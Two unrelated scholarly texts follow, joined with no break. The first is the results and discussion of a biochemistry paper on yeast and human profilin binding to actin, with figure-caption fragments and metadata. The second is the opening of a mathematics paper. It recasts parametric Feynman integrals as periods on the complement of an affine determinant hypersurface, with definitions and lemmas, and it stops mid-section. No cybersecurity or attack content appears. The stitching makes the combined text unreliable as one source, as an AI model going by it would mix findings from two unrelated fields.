Kinetics of Profilin Binding to G-actin-The kinetics of the binding of profilin to G-actin was monitored over time by the decrease in intrinsic tryptophan fluorescence caused by the interaction using a BioLogic SFM3 stopped-flow instrument (BioLogic). The data were further analyzed with Kinsim/Fitsim software (available on the World Wide Web) and fitted to the following model (Reaction 1), where A represents G-actin, P is profilin, and AP is the actinprofilin complex. The kinetic rate constants (k on and k off ) of profilin binding to actin were obtained from the average of fitting data from at least three sets of experiments with different profilin concentrations. The K d is calculated from the results of k off /k on .
RESULTS
Our goal was to determine the molecular basis underlying the ability of profilin to facilitate the exchange of nucleotide from actin. Toward this end, we analyzed the interaction of yeast and human profilins with yeast and muscle actin. These two actin isoforms are 87% identical in sequence (21), and they only vary in three residues in what is thought to constitute the profilin binding surface (17). Residues Glu 167 , Tyr 169 , and Arg 372 in muscle actin are replaced by Ala 167 , Phe 169 , and His 372 in yeast actin, respectively.
We first assessed the rate of nucleotide exchange brought about by increasing concentrations of profilin in the presence of a constant amount of actin. In this analysis, the K d for the actinprofilin interaction can be derived from the first-order rate constants for the decrease in fluorescence resulting from the exchange of bound ⑀ATP from the actin surface. This analysis has been used previously (5) and is described under "Materials and Methods." Fig. 1A shows the increase in nucleotide exchange rate from yeast actin caused by saturating concentrations of yeast profilin (YPF) and human profilin 1 (HPF1). HPF1 produces a 10-fold increase in this rate, whereas YPF produces only a 4-fold acceleration (Table 1). For muscle actin with YPF, there was 3-fold activation (17), and with HPF1 and muscle actin, there was a 35-fold enhancement (data not shown). Clearly, the small enhancement of nucleotide exchange previously observed with yeast actin and yeast profilin does not result from some maximal rate at which a yeast actin can exchange nucleotide due to its inherently more open conformation (17,26). HPF1, at saturating conditions, is simply a better catalyst of nucleotide exchange than YPF, whether yeast or muscle actin is utilized. Fig. 1B shows the rate constants calculated from curves similar to those described in Fig. 1A for the interaction of different concentrations of YPF or HPF1 with yeast actin. Table 1 shows that like the case involving the two profilins with muscle actin (17), the homologous pair had a K d about 5 times stronger than that exhibited by the heterologous pair. However, it is apparent The data for each curve were fit to a first order decay curve to obtain k obs . Red, YPF; blue, HPF1; black, no profilin. Empty circles, data points; solid lines, fits. The same experiment was performed twice with essentially the same results. One of the two studies is shown here. B, the observed dissociation rates (k obs ) obtained from the actin-bound ⑀ATP exchange of 1 M yeast WT actin as described in Fig. 1 in the presence of either YPF (E) or HPF1 (Ⅺ) were plotted against the varying profilin concentrations used. Each experimental data set was simulated with Equation 1 and depicted with solid symbols and lines. The experiment was performed twice with essentially identical results. One experiment is shown here. from the data that K d and rate catalytic ability do not strictly correlate.
A better measure of catalytic activity with respect to enzyme function is the catalytic efficiency or k cat /K d , since most enzymes do not work at saturating conditions. This may very well be the case in vivo for profilins (16,27). To apply this analysis to the profilin/actin system, for a given actin, we divided the -fold enhancement of rate exchange by the K d for the particular actin-profilin pair. With yeast actin, this efficiency measure was 6.7 M Ϫ1 for YPF and only 3 M Ϫ1 for HPF1 (Table 1). Based on the data referred to above, the catalytic efficiency for the HPF1muscle actin pair is 350 M Ϫ1 . From the work of Eads et al. (17), the catalytic efficiency of the YPF-muscle actin pair is about 1 M Ϫ1 . In summary, the homologous set of proteins was always more efficient than the heterologous pair.
We next used ITC to examine the energetics that characterized the interaction of yeast actin with yeast and human profilins. Fig. 2A shows the experimental data for the repeated injection of YPF into a solution of yeast actin, and Fig. 2B presents the corrected integrated data with a curve fit for the data in Fig. 2A. Values for ⌬H and T⌬S were then extracted from these data as described under "Materials and Methods." Table 2 shows these values along with the corresponding values for K a or K d for the interaction of yeast and human profilins with yeast actin. For the sake of comparison, values obtained previously for the interaction of these two profilins with muscle actin are shown (17). With both actins, the interaction with YPF is strongly enthalpically driven. The change in entropy is actually unfavorable. Conversely, for HPF1, although the change in enthalpy is favorable, it is much less so than for yeast actin. This lower ⌬H, however, is offset by a favorable change in entropy. The data demonstrate that the nature of the profilin isoform and not the actin isoform appears to dictate the energetics that characterize the interaction of these two proteins. It is interesting that the nature of the interactions is so different, considering that the profilin binding surface on actin is very much alike for the different isoforms involved.
Role of Human Profilin Residue Glu 82 in the Actin-bound Nucleotide Exchange-We wished to gain insight into the reason that HPF1 produced a faster nucleotide exchange rate than did YPF. In comparison with YPF, mammalian profilins contain an extra loop between Leu 78 and Asp 86 . Based on the -actinbovine profilin co-crystal (18), Glu 82 in this loop might form a hydrogen bond with actin Lys 113 in subdomain 1, which is conserved in both yeast and muscle actins, as shown in Fig. 3. Lys 113 is located on the back face of the actin monomer close to His 73 and the hinge region. This extra actin Lys 113 -profilin Glu 82 hydrogen bond interaction might enhance the ability of profilin to open the actin cleft, leading to the greater rate of exchange that is observed. To test this hypothesis, we mutated HPF1 Glu 82 to Lys, Ser, or Ala and assessed the actin-bound ⑀ATP release rate in the presence of the mutant profilins. Fig. 4 demonstrates that at saturating concentrations, all three mutant profilins facilitate the yeast actin nucleotide exchange 9 -13fold, respectively, similar to the value obtained with WT HPF1. The mutations also cause little if any effect on the K d for the actin-profilin interactions (data not shown). A similar enhancement for muscle actin-bound ATP was also observed (data not shown). Thus, the ability to form this postulated hydrogen bond is not critical for catalysis of nucleotide exchange or for the affinity of the interaction (data not shown).
Role of Actin Residue 372 in the Actin-Profilin Interaction-It had been suggested that Arg 372 in subdomain 1 of muscle actin, via its ability to hydrogen-bond with residue Tyr 79 in Schizosaccharomyces pombe profilin (Tyr 78 in Saccharomyces cerevisiae profilin; Asp 86 in mammalian profilin), played a major role in profilin-dependent catalysis of actin nucleotide exchange (28). Yeast actin contains a His at this position. To address the importance of Arg 372 in the actin-profilin inter- action, we assessed the ability of YPF to catalyze nucleotide exchange from H372R yeast actin. As with WT actin, the profilin-catalyzed rate was 2.5 times that observed for actin alone. However, the binding affinity of this mutant actin (K d ϭ 0.06 M) was about 10-fold greater than observed with WT actin, resulting in a large increase in catalytic efficiency for the YPF-dependent nucleotide exchange from 6.7 to 42 M Ϫ1 . Again, these observations demonstrate a lack of correlation between tightness of the binding and catalytic ability at saturating profilin concentrations. Characterization of Profilin Interaction with Yeast/Muscle Hybrid Actins-To gain greater insight into the relative contribution of the two actin domains to actin-actin-binding protein interactions, we had previously constructed two yeast/muscle hybrid actins in which either yeast actin subdomain 1 (sub1) or both subdomain 1 and 2 (sub12) had been converted to its muscle counterparts (22). In the most complete hybrid, sub12, 21 yeast residues had been substituted with their corresponding muscle residues. As the extent of muscle character of the actin increased, the nucleotide exchange rate slowed until in sub12, it was equal to that observed with muscle actin (22). Evidently, the structure of subdomain 1 of actin plays a major role in dictating the nucleotide exchange properties of the protein. The decrease in fluorescence caused by ⑀ATP exchange was followed over time, and data were fit to a first order reaction mechanism (solid lines) as described under "Materials and Methods." The experiment was repeated with essentially the same results, and one data set is shown here. a.u., arbitrary units. Since these hybrid actins would contain a hybrid profilin binding site (yeast subdomain 3 and muscle subdomain 1), they presented an opportunity to determine the relative roles played by each domain in both the binding of profilin to actin and the ability of profilin to accelerate nucleotide exchange. Fig. 5 and Table 3 show that for both sub1 and sub12 actins, both profilins at saturating conditions resulted in about a 16 -20 times acceleration of ⑀ATP exchange. Note that the starting rates in the absence of profilin for sub1 and sub12 are 0.007 and 0.003 s Ϫ1 , respectively. The K d values for the interaction of YPF were about 2 M for each of the hybrid actins. This value is higher than that for yeast actin and somewhat lower than that for muscle actin, as might be expected for a hybrid molecule. However, the analysis involving HPF1 produced unexpected results; The K d values for sub1 (5.6 M) and sub12 actins (8.1 M) were 70 -80-fold higher than with muscle actin, which has a K d of 0.1 M (data not shown), and 3-4-fold larger than with yeast actin. Mean-while, the catalytic efficiencies for the YPF/sub1 and YPF/ sub12 are 7.6 and 11 M Ϫ1 , and the catalytic efficiencies for the HPF1 complexes are 3 and 2 M Ϫ1 . These efficiencies are similar to those seen with YPF/HPF1 binding to yeast actin, far different from the efficiency of the HPF1-muscle actin complex based on the data from Eads et al. (17). This result suggests that actin subdomain 3 is the major determinant in the regulation of the catalytic efficiency of the actin-profilin complex.
To explore further the reason for the greater effect of the hybrid nature of the actin on HPF1 versus YPF binding, we repeated the ITC analysis with the two profilins using the two hybrid actins. As seen in Fig. 6 and Table 4, for both profilins, the enthalpic and entropic contributions with sub12 actin were similar to those observed with the WT actins. The YPF interaction is completely enthalpically driven, whereas the HPF1 interaction is both enthalpically and entropically driven. Surprisingly, for sub1 actin missing the three sub2 muscle residues, there is a sharp decrease in enthalpic change and a marked increase in entropic change for both profilins. This result suggests that either the interaction of actin subdomains 1 and 2 with each other or interactions between the two domains of actin across the nucleotide cleft plays a major role in dictating the topography of the surface at the barbed end of the protein where the profilin binds.
Contribution of Three Muscle Actin-specific Subdomain 2 Residues to the Profilin-Actin Interaction-Yeast and muscle
actin subdomain 2 differ from one another by only three residues. The yeast to muscle changes, all very similar in nature to the original residue, are I43V, R68K, and V76I. However, when added to the sub1 hybrid actin, these residues together cause a 2-fold retardation in the rate of nucleotide exchange to near that seen with muscle actin, and they drastically alter the energetics of binding for the actin to profilin as shown above.
To determine the relative contributions of each of these three residues to these differences in actin behavior, each was introduced independently into sub1 actin. Compared with the exchange rate for sub1 actin alone (0.007 s Ϫ1 ), I43V ϩ sub1 or R68K ϩ sub1 actins showed a mildly retarded exchange rate (0.005 s Ϫ1 ) (Fig. 7). The addition of the V76I mutation, the residue nearest the binding site for the nucleotide phosphate, caused the greatest retardation in rate (0.003 s Ϫ1 ), a value near that observed with muscle actin and sub12 actin (Fig. 7). All of these experiments were repeated twice with essentially the To determine if position 76 also exhibited the greatest influence on the profilin-binding properties of actin, we repeated the ITC profilin binding assay with each of these three new mutant actins. Table 5 shows that each of these mutant actins had nearly the same K d with respect to YPF binding. However, there were small but position-specific differences in the changes in enthalpy and entropy. I43V was much closer to sub12 actin in terms of having the greatest negative change in enthalpy and the least favorable entropic change. R68K sub1 and V76I sub1 actins, virtually identical to one another in K d , had less of an enthalpic contribution by about 1.5 kcal/mol and a positive entropic change, a profile like that seen with sub1 actin. Thus, the substitution that exerted the most effect on actin nucleotide exchange per se was different from that which most affected the interaction of actin with profilin.
Kinetics of Binding of Yeast Profilin to WT, sub1, and sub12
Yeast Actins-The differences in thermodynamics describing the interaction of YPF with WT, sub1, and sub12 actins might be reflected in differences in k on and k off from complex formation that could affect the lifetime of the profilin complex stability, thereby, affecting the catalysis of nucleotide exchange. To determine these constants, we followed the change in intrinsic tryptophan fluorescence that occurs when profilin binds to actin, using a stopped-flow apparatus. Modeling of the decay curves (Fig. 8) as described under "Materials and Methods" allowed an extraction of the k on and k off for each of these interactions ( Table 6). The K d values obtained from the ratio of k on /k off are consistent with those obtained by the exchange and ITC assays. Although there appear to be relatively small differences in k on and k off for the three actins tested, these differences were not statistically significant by t test.
DISCUSSION
Our primary focus was to determine the factors that regulate the ability of profilin to bind to actin and then to promote the exchange of nucleotide from actin. This knowledge is necessary to appreciate the molecular basis that governs profilin regulation of actin filament dynamics within the cell. Our basic approach was to use two different profilins, YPF and HPF1, along with muscle, yeast, and yeast/muscle hybrid actins to try to gain insight into the control of these two processes at the molecular level. The results we have obtained have provided new insight into the manner in which profilin binds to actin and influences actin conformation, important for both the role of profilin as an actin buffer and as a facilitator for formin-dependent filament elongation. They also provide insight into how this binding reaction can be translated into facilitation of actin-dependent nucleotide exchange.
Catalysis of Nucleotide Exchange-We first addressed the ability of profilin to facilitate actin nucleotide exchange under saturating profilin concentrations. Our results clearly demonstrate that, independent of the actin being worked on, HPF1 is better able to cause nucleotide exchange than is YPF. One might imagine that two proteins from the same cell co-evolve to produce the most effectively acting system. Since yeast actin assumes a more open conformation compared with muscle actin (26), one could hypothesize that the actin cleft can only be opened so far to promote nucleotide exchange before the protein denatures. Consequently, the small degree of enhancement of nucleotide exchange associated with the YPF-yeast actin interaction would reflect this limiting rate. What appeared to be this limit based on YPF experiments can clearly be exceeded by HPF1. However, the inherently increased flexibility of yeast versus muscle actin may still be a significant factor in the differences in -fold increase in profilin-dependent release rate we observed using these two actins.
Minehardt et al. (29), based on molecular dynamics simulations, proposed that the open cleft state seen in the profilinactin crystal complex by itself is very unstable and rapidly collapses to the closed state. In essence, there is an unfavorable equilibrium between the closed and open cleft states, and the role of profilin is to stabilize the small amount of open state that would exist, thereby promoting nucleotide exchange. Thus, the rate enhancement is passively rather than actively brought about. Our results show that either with yeast or muscle actin, two different profilins cause different degrees of enhancement of exchange rate. It had also been reported that plant profilin causes no rate enhancement (14). In the Minehardt et al. (29) paradigm, this result would imply a number of multiple conformations of actin between the open and closed states, each of which would be preferentially captured by a different profilin. A plausible alternative model is that the profilin binds the closed state and uses the binding energy to open the cleft to the degree that is permitted by the specific profilin being used.
Based on the crystal structure of the actin-profilin complex, a potential explanation for the ability of HPF1 to better enhance nucleotide exchange than YPF is the presence of an extra loop on the human profilin, which, through residue Glu 82 , might form a hydrogen bond with Lys 113 on actin. This extra attach-ment between the two proteins might generate a lever arm that the human profilin could utilize to more easily alter the nucleotide cleft on actin leading to enhanced exchange. However, when we tested this theory by eliminating the Asp from position 82, no deleterious affect was produced on the nucleotide exchange caused by HPF1. Thus, the basis for this difference in catalytic ability between HPF1 and YPF must not involve formation of this interprotein bond.
Analysis of the Binding of Profilin to Actin-Our results provide new insight into the factors that regulate the binding of profilin to actin. In all cases we examined, the homologous pair of proteins (e.g. YPF and yeast actin) exhibited a tighter interaction than did a heterologous pair, and both homologous pairs had about the same K d . What was interesting is that tight binding did not necessarily correlate with increased ability to alter the conformation of the actin around the bound nucleotide, leading to exchange. Our data also showed that, using a biologically more meaningful comparison, catalytic efficiency (-fold increase in exchange rate/K d ), for yeast actin-YPF and muscle actin-HPF1, the efficiencies are clearly higher than for the heterologous pairs.
Studies with Yeast/Muscle Hybrid Actins-Based on crystallographic evidence (18,19), the profilin binding site on actin, at the barbed end of the protein, spans actin subdomains 1 and 3 across the interdomain hinge helix. It has been estimated that between the two proteins, about 70% of the contacts involve subdomain 3 (17,30). Furthermore, across the entire profilin binding surface on actin, there are only three differences between the yeast and muscle actins. However, the binding parameters that characterize the interaction of the same profilin with different actins are strikingly different. This result strongly suggests that despite the high homology among different actins in terms of primary and tertiary structure, the few differences must alter the topography of the profilin binding site on the actin surface enough to affect the manner in which the pair of proteins interacts to form the complex.
The use of our yeast muscle hybrid actins allowed us to gain insight into the contributions of actin subdomains 1 and 3 to this difference. For both hybrid actins, which contain muscle subdomain 1, YPF binds about 3-4 times more tightly than does HPF1, consistent with subdomain 3 (yeast in this case) being the predominant binding surface. Although the data suggest that subdomain 3 is a major regulator of binding tightness, the contribution of actin subdomain 1 to binding is not inconsequential. In mammalian profilin, there is a potential hydrogen bond between profilin Asp 86 (Tyr 79 and Tyr 78 in S. pombe and S. cerevisiae profilins, respectively) and actin Arg 372 in subdomain 1. In plant profilin, the residue in this position is replaced by an Arg, which would cause a repulsive interaction. Lu and Pollard (28) altered the Tyr 79 in S. pombe profilin to Arg, resulting in a significant weakening of binding and a loss of ability to catalyze nucleotide exchange. We examined the importance of this hydrogen bond from the perspective of actin. Yeast actin has His 372 instead of Arg and should make a much weaker hydrogen bond. In our hands, conversion of His 372 to Arg, which would strengthen the interprotein interaction, caused an about 8-fold tighter binding with profilin but no change in exchange activity, again consistent with lack of an obligatory coupling between binding affinity and catalytic capability.
Our binding data concentrating the importance of actin subdomain 3 are consistent with a proposal recently made by Zheng et al. (31) regarding the basis of the preference of profilin for ATP over ADP actin. They predicted a nucleotide-dependent change in conformation of a loop involving actin residues 165-175, which might contribute to the selectivity observed with profilin. Interestingly, two of the three divergent residues between yeast and muscle actin in the profilin binding site, residues 167 and 169, fall in this loop in actin subdomain 3, consistent with our results.
Profilin/Actin Binding Energetics-Our ITC experiments allowed us to examine separately the enthalpic and entropic contributions to the actin-profilin interaction. Using the muscle and yeast WT actins, we showed that the profilin, not the actin, seems to dictate the energetics of binding. For both actins, the binding of YPF was largely enthalpically driven, whereas that of HPF1 was much less enthalpically and much more entropically dependent. We observed an intriguing difference between the interaction of sub1 and sub12 hybrid actins with YPF; sub1 actin produced an entropically driven interaction, as seen with HPF1, whereas sub12 yielded an enthalpically driven interaction, typical of YPF. These observations suggest that subdomains 1 and 2 co-evolved in order to maintain the allosteric connections that would allow the entire domain containing these subdomains to function as an integrated unit. If this unit is intact, as is the case for the sub12 actin, our results suggest that actin subdomain 3 exerts the most influence over the manner in which actin and profilin interact. Creation of a subdomain 1/subdomain 2 mismatch, as in the case of sub1 actin, would destroy this integration, leading to a situation where subdomain 1 was now acting in an uncoupled fashion. The result of this creation would be an altered binding surface that results in a switch from enthalpically to entropically dominant binding of profilin.
To gain more insight into the basis of the alteration in the nucleotide exchange and profilin binding behavior caused by the introduction of the three actin subdomain 2 muscle residues, we examined the results of the individual subdomain 2 mutations against an otherwise muscle subdomain 1 background. For both nucleotide exchange and profilin binding, there was a predominant residue responsible for the switch. Surprisingly, however, the predominantly responsible residue was different for each process. For nucleotide exchange, the biggest influence was exerted by the V76I mutation. Residue 76 lies in a group of five tightly packed residues extending from residue 118 on the outer surface of actin through His 73 to the nucleotide binding site. If the V76I conversion results in tighter packing with a resulting closure of the interdomain cleft, the result might very well be the retarded rate of nucleotide exchange that our results demonstrate. For energetics of binding, the main influence seemed to be exerted by the I43V substitution in the DNase I loop, the farthest of the three residues away from the proposed profilin binding site. Previous studies have shown that the N-terminal part of the DNase I loop is very influential in terms of the allosteric behavior of the protein.
There is demonstrated allostery between the actin C terminus in subdomain 1 and the DNase I loop (32). Additional cleavage of the loop at residues 42 and 43 by E. coli protease also drastically affects actin polymerization as well as monomeric behavior of the actin (33).
In conclusion, understanding how the allosteric integration between actin subdomains 1 and 2 results in the conformational control that regulates profilin binding and other actindependent processes is a major challenge for the future. The approach we have taken and the results we have obtained provide a foundation for this type of investigation and insight into how answering this question might be best achieved. | 2018-04-03T03:32:06.381Z | 2008-04-04T00:00:00.000 | {
"year": 2008,
"sha1": "43d1a3fac7b83725102ecfcf9b51dc5ad4c56373",
"oa_license": "CCBY",
"oa_url": "http://www.jbc.org/content/283/14/9444.full.pdf",
"oa_status": "HYBRID",
"pdf_src": "Highwire",
"pdf_hash": "340c9ce1c8aecd32f08efcd8713eaf61905931a8",
"s2fieldsofstudy": [
"Biology"
],
"extfieldsofstudy": [
"Biology",
"Medicine"
]
} |
5837709 | pes2o/s2orc | v3-fos-license | Parametric Feynman integrals and determinant hypersurfaces
The purpose of this paper is to show that, under certain combinatorial conditions on the graph, parametric Feynman integrals can be realized as periods on the complement of the determinant hypersurface in an affine space depending on the number of loops of the Feynman graph. The question of whether the Feynman integrals are periods of mixed Tate motives can then be reformulated (modulo divergences) as a question on a relative cohomology being a realization of a mixed Tate motive. This is the cohomology of the pair of the determinant hypersurface complement and a normal crossings divisor depending only on the number of loops and the genus of the graph. We show explicitly that this relative cohomology is a realization of a mixed Tate motive in the case of three loops and we give alternative formulations of the main question in the general case, by describing the locus of intersection of the divisor with the determinant hypersurface complement in terms of intersections of unions of Schubert cells in flag varieties. We also discuss different methods of regularization aimed at removing the divergences of the Feynman integral.
Introduction
The question of whether Feynman integrals arising in perturbative scalar quantum field theory are periods of mixed Tate motives can be seen (see [10], [9]) as a question on whether certain relative cohomologies associated to algebraic varieties defined by the data of the parametric representation of the Feynman integral are realizations of mixed Tate motives. In this paper we investigate another possible viewpoint on the problem, which leads us to consider a different relative cohomology, defined in terms of the complement of the affine determinant hypersurface and the locus where the hypersurface intersects the image of a simplex under a linear map defined by the Feynman graph. For all graphs with a given number of loops ℓ, admitting a minimal embedding in an orientable surface of genus g, and satisfying a natural combinatorial condition, we relate the question mentioned above to a problem in the geometry of coordinate subspaces of an ℓ-dimensional vector space, which only depends on the genus g.
More precisely, we consider for each graph Γ as above and satisfying a transparent combinatorial condition (summarized at the beginning of §5) a normal crossing divisorΣ Γ in the affine space A ℓ 2 of ℓ × ℓ matrices. We observe that, modulo the issue of divergences, the parametric Feynman integral is a period of the pair (A ℓ 2 D ℓ ,Σ Γ (D ℓ ∩Σ Γ )), whereD ℓ is the determinant hypersurface. We then observe that all these normal crossing divisorsΣ Γ may be immersed into a fixed normal crossing divisorΣ ℓ,g , determined by the number of loops ℓ and the embedding genus g; therefore, the question of whether Feynman integrals are periods of mixed Tate motives may be decided by verifying that the motive m(A ℓ 2 D ℓ ,Σ Γ (D ℓ ∩Σ ℓ,g )), whose realization is the relative cohomology of the corresponding pair, is mixed Tate. In fact, we show that verifying this assertion for g = 0 would suffices to deal with all graphs Γ with b 1 (Γ) = ℓ (and satisfying our combinatorial condition), simultaneously for all genera. We approach this question by an inclusion-exclusion argument, reducing it to verifying that specific loci in A ℓ 2 are mixed Tate (see §5. 3). We carry out this verification for ℓ ≤ 3 loops ( §6), showing that the motive m(A 9 D 3 ,Σ 3,0 (D 3 ∩Σ 3,0 ) is mixed Tate. In doing so, we obtain explicit formulae for the class [Σ 3,0 (D 3 ∩Σ 3,0 )] (corresponding to the 'wheel with three spokes') and for the classes of strata of the same locus, in the Grothendieck group of varieties. These classes may be assembled to construct the corresponding class for any graph with three loops (satisfying our combinatorial condition). This illustrates a simple case of our strategy: it follows that, modulo the issue of divergences, Feynman integrals of graphs with three or fewer loops are indeed periods of mixed Tate motives. Carrying out the same strategy for a larger number of loops is a worthwhile project.
Finally, in §7 we discuss the problem of regularization of divergent Feynman integrals, and how different possible regularizations can be made compatible with the approach via determinant hypersurfaces described here. We recall the basic notation and terminology we use in the following.
where L int (φ) is a polynomial in φ of degree at least three. Then a one particle irreducible (1PI) Feynman graph Γ of the theory is a finite connected graph with the following properties.
• The valence of each vertex is equal to the degree of one of the monomials in the Lagrangian (1.1). • The set E(Γ) of edges of the graph is divided into internal and external edges,
Γ). Each internal edge connects two vertices of the graph, while the external edges have only one vertex. (One thinks of an internal edges as being a union of two half-edges and an external one as being a single half-edge.)
• The graph cannot be disconnected by removing a single internal edge. This is the 1PI condition.
In the following we denote by n = #E int (Γ) the number of internal edges, by N = #E ext (Γ) the number of external edges, and by ℓ = b 1 (Γ) the number of loops.
In their parametric form, the Feynman integrals of massless perturbative scalar quantum field theories (cf. §6-2-3 of [22], §18 of [7], and §6 of [27]) are integrals of the form (1.2) U (Γ, p) = Γ(n − Dℓ/2) (4π) ℓD/2 σn P Γ (t, p) −n+Dℓ/2 ω n Ψ Γ (t) −n+(ℓ+1)D/2 , where Γ(n − Dℓ/2) is a possibly divergent Γ-factor, σ n is the simplex and the polynomials Ψ Γ (t) and P Γ (t, p) are obtained from the combinatorics of the graph, respectively as where the sum is over all the spanning trees T of Γ and where the sum is over the cut-sets C ⊂ Γ, i.e. the collections of b 1 (Γ) + 1 internal edges that divide the graph Γ in exactly two connected components Γ 1 ∪ Γ 2 . The coefficient s C is a function of the external momenta attached to the vertices in either one of the two components Here the P v are defined as where the p e are incoming external momenta attached to the external edges of Γ and satisfying the conservation law (1.8) e∈Eext (Γ) p e = 0.
In order to work with algebraic differential forms defined over Q, we assume that the external momenta are also taking rational values p e ∈ Q D . Ignoring the Γ-function factor in (1.2), one is interested in understanding what kind of period is the integral (1.9) σn P Γ (t, p) −n+Dℓ/2 ω n Ψ Γ (t) −n+(ℓ+1)D/2 .
In quantum field theory one can consider the same physical theory (with specified Lagrangian) in different spacetime dimensions D ∈ N. In fact, one should think of the dimension D as one of the variable parameters in the problem. For the purposes of this paper, we work in the range where D is sufficiently large, so that n ≤ Dℓ/2. The case n = Dℓ/2 is the log divergent case, where the integral (1.9) simplifies to the form (1.10) σn ω n Ψ Γ (t) D/2 . Another case where the Feynman integral has the simpler form (1.10), even for graphs that do not necessarily satisfy the log divergent condition, i.e. for n = Dℓ/2, is where one considers the case with nonzero mass m = 0, but with external momenta set equal to zero. In such cases, the parametric Feynman integral becomes of the form In the following we assume that we are either in the massless case (1.9) and in the range of dimensions D satisfying n ≤ Dℓ/2, or in the massive case with zero external momenta (1.11) and arbitrary dimension.
A first issue one needs to clarify in addressing the question of Feynman integrals and periods is the fact that the integral (1.9) is often divergent. Divergences are contributed by the intersection σ n ∩X Γ , withX Γ = {t ∈ A n | Ψ Γ (t) = 0}, which is often non-empty. Although there are cases where a nonempty intersection σ n ∩X Γ may still give rise to an absolutely convergent integral, hence a period, these are relatively rare cases and usually some regularization and renormalization procedure is needed to eliminate the divergences over the locus where the domain of integration meets the graph hypersurface. Notice that these intersections only occur on the boundary ∂σ n , since in the interior of σ n the polynomial Ψ Γ (t) is strictly positive (see (1.4)).
Our results will apply directly to all cases where the integral is convergent, while we discuss in Section 7 the case where a regularization procedure is required to treat divergences in the Feynman integrals. The main question is then, more precisely formulated, whether it is true that the numbers obtained by computing such integrals (after removing a possibly divergent Gamma factor, and after regularization and renormalization when needed) are always periods of mixed Tate motives.
The main contribution of this paper is the reformulation of the problem, where instead of working with the graph hypersurfaces X Γ defined by the vanishing of the graph polynomial Ψ Γ , one works with the complement of a fixed determinant hypersurface in an affine space of matrices. This allows us to reduce the problem to one that only depends on the number of loops of the graph, at least for the class of graphs satisfying the combinatorial condition discussed in §2 (for example, 3-vertex connected planar graphs with ℓ loops). We propose specific questions in terms of ℓ alone, in §5.3; these questions may be appreciated independently of our motivation, as they do not refer directly to Feynman graphs. We hope that these reformulations might help to connect the problem to other interesting questions, such as the geometry of intersections of Schubert cells and Kazhdan-Lusztig theory.
Feynman parameters and determinants
With the notation as above, for a given Feynman graph Γ, the graph hypersurface X Γ is defined as the locus of zeros Indeed, Ψ Γ is homogeneous of degree ℓ, hence it defines a hypersurface of degree ℓ in the projective space P n−1 . We will also consider the affine cone on X Γ , namely the affine hypersurface The question of whether the Feynman integral is a period of a mixed Tate motive can be approached (modulo the divergence problem) as a question on whether the relative cohomology is a realization of a mixed Tate motive, where Σ n is the algebraic simplex i.e. the union of the coordinate hyperplanes containing the boundary of the domain of integration ∂σ n ⊂ Σ n . See for instance [10], [9]. Although working in the projective setting is very natural (see [10]), there are several reasons why it may be preferable to consider affine hypersurfaces: • Only in the limit cases of a massless theory or of zero external momenta in the massive case does the parameteric Feynman integral involve the quotient of two homogeneous polynomial ( [7], §18). • The deformations of the φ 4 quantum field theory to noncommutative spacetime, which has been the focus of much recent research (see e.g. [20]), shows that, even in the massless case the graph polynomials Ψ Γ and P Γ are no longer homogeneous in the noncommutative setting and only in the limit commutative case they recover this property (see [21], [23]).
• As shown in [2], in the affine setting the graph hypersurface complement satisfies a multiplicative property over disjoint unions of graphs that makes it possible to define algebro-geometric and motivic Feynman rules. For these various reasons, in this paper we primarily work in the affine rather than in the projective setting.
In the present paper, we approach the problem in a different way, where instead of working with the hypersurfaceX Γ , we map the Feynman integral computation and the graph hypersurface in a larger hypersurfaceD ℓ inside a larger affine space, so that we will be dealing with a relative cohomology replacing (2.3) where the ambient space (the hypersurface complement) only depends on the number of loops in the graph.
2.1. Determinant hypersurfaces and graph polynomials. We now show that all the affine varietiesX Γ , for fixed number of loops ℓ, map naturally to a larger hypersurface in a larger affine space, by realizing the polynomial Ψ Γ for the given graph as a pullback of a fixed polynomial Ψ ℓ in ℓ 2 -variables.
Recall that the determinant hypersurface D ℓ is defined in the following way. Let k[x kr , k, r = 1, . . . , ℓ] be the polynomial ring in ℓ 2 variables and set Since the determinant is a homogeneous polynomial Ψ ℓ , this in particular also defines a projective hypersurface in P ℓ 2 −1 . We will however mostly concentrate on the affine hypersurfaceD ℓ ⊂ A ℓ 2 defined by the vanishing of the determinant, i.e. the cone in A ℓ 2 of the projective hypersurface D ℓ . Suppose given any Feynman graph Γ with b 1 (Γ) = ℓ, and with #E int (Γ) = n. It is well known (see e.g. §18 of [7]) that the graph polynomial Ψ Γ (t) can be equivalently written in the form of a determinant where the n × ℓ-matrix η ik is defined in terms of the edges e i ∈ E(Γ) and a choice of a basis for the first homology group, l k ∈ H 1 (Γ, Z), with k = 1, . . . , ℓ = b 1 (Γ), by setting +1 edge e i ∈ loop l k , same orientation −1 edge e i ∈ loop l k , reverse orientation 0 otherwise.
The determinant det M Γ (t) is independent both of the choice of orientation on the edges of the graph and of the choice of generators for H 1 (Γ, Z). The expression of the matrix M Γ (t) defines a linear map τ : A n → A ℓ 2 of the form We can write this equivalently in the shorter form where Λ is the diagonal n × n-matrix with t 1 , . . . , t n as diagonal entries, and η = η Γ is the matrix (2.8).
Then by construction we have thatX Γ = τ −1 (D ℓ ), from (2.6). We formalize this as follows: Lemma 2.1. Let Γ be a Feynman graph with n internal edges and ℓ loops. LetX Γ ⊂ A n denote the affine cone on the projective hypersurface X Γ ⊂ P n−1 . Then where τ : A n → A ℓ 2 is a linear map depending on Γ.
The next lemma, which follows directly from the definitions, details some of the properties of the map τ introduced above that we will be using in the following.
• For i = j, the corresponding entry is the sum of ±t k , where the t k correspond to the edges common to the i-th and j-th loop, and the sign is +1 if the orientations of the edges both agree or both disagree with the loop orientations, and −1 otherwise. When the map τ constructed above is injective, it is possible to rephrase the computation of the parametric Feynman integral (1.9) as a period of the complement of the determinant hypersurfaceD ℓ ⊂ A ℓ 2 . Lemma 2.3. Assume that the map τ : A n → A ℓ 2 of (2.10) is injective. Then the integral (1.9) can be rewritten in the form where P Γ (p, x) is a homogeneous polynomial on A ℓ 2 whose restriction to the image of A n under the map τ agrees with P Γ (p, t), and ω Γ is the induced volume form.
